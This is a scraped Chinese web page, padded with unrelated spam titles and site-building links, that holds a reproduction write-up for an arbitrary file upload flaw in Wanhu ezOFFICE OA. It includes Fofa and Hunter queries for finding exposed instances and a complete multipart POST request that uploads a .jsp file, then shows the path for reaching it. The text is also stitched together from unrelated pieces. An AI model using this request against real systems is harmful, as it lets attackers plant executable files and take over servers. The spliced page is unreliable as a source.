当前位置: 首页 > news >正文

jsp网站开发之html入门知识wordpress产品图片

jsp网站开发之html入门知识,wordpress产品图片,厦门企业做网站,自建网站视频教程0x01 产品描述: 万户OA(Office Automation)是一款企业级协同办公管理软件,旨在为企业提供全面的办公自动化解决方案。万户ezOFFICE存在任意文件上传漏洞。攻击者可以通过该远程下载任意文件到目标服务器,导致攻击者可获…

0x01 产品描述:

        万户OA(Office Automation)是一款企业级协同办公管理软件,旨在为企业提供全面的办公自动化解决方案。万户ezOFFICE存在任意文件上传漏洞。攻击者可以通过该远程下载任意文件到目标服务器,导致攻击者可获取服务器控制权限。

0x02 漏洞描述:

        万户OA-ezOFFICE fileUpload.controller中存在一个 任意文件上传漏洞,通过这个漏洞可以操纵任意文件的写入。这意味着不法分子可以利用这个漏洞来上传任意可执行性文件用于远程系统执行、数据获取、系统接管等,严重威胁系统的安全性

0x03 搜索语句:

Fofa:app="万户ezOFFICE协同管理平台" || app="万户网络-ezOFFICE"

Hunter: app.name="万户 Ezoffice OA"

0x04 漏洞复现:

POST /defaultroot/upload/fileUpload.controller HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
Content-Length: 773--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
Content-Disposition: form-data; name="file"; filename="1.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary12345
--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0--

 上传成功后拼接下列接口进行访问 

http://your-ip:port/defaultroot/upload/html/2024xxxxxxxxxxxxxx.jsp

 

0x05 修复建议:

厂商已发布补丁,请及时修复

http://www.yayakq.cn/news/223986/

相关文章:

  • app公司网站模板建设网站如何赢利
  • 网站百度抓取怎么创建自己的博客网站
  • 大连哪家公司做网站好网址怎么弄
  • 安徽网站建设方案优化网站建设的基本技术步骤
  • 做网站找个人如何让网站做网页适配
  • 潍坊网站建设seo镇江网红景点
  • 网站建设方案 filetype doc西宁网站建设公司排行
  • 驻马店网站制作湖南省建一公司官网
  • 百度提交网站已删内容网站开发环境选择
  • 中介网站制度建设中国石油工程建设协会网站
  • 导师让做网站莱州市招聘网站
  • 浏览器网站进入口wordpress编辑图片不显示
  • 建设部网站 信用诚信评分标准泉州商城网站开发设计
  • 做群头像的网站在线制作百度运营培训班
  • 朱子网站建设兴城泳装电子商务网站建设
  • 建设银行官网站下载亳州市建设工程质量监督站网站
  • 江苏seo推广网站建设上海网站营销是什么
  • 网站权限配置客户关系管理软件有哪些
  • 房产中介网站建设技巧网站怎么推广怎么做
  • 腾讯云服务器centos做静态网站有了公网ip如何做网站
  • 名词解释 网站规划河南网站建设yipinpai
  • 传奇网站源码下载校园网站建设意见
  • 网站怎么做第三方支付接口建设公司网站的细节
  • wordpress 全站不刷新王野摩托车是什么牌子
  • 关于网站建设心得体会公司网站开发怎么入账
  • 厦门百度搜索网站排名如何做域名网站
  • 网站中的冒号网站做的支付宝接口
  • 网站建设一键搭建静态企业网站下载
  • 职高网站建设例题上海房地产新闻
  • 公司部门岗位职责宁波seo推广费用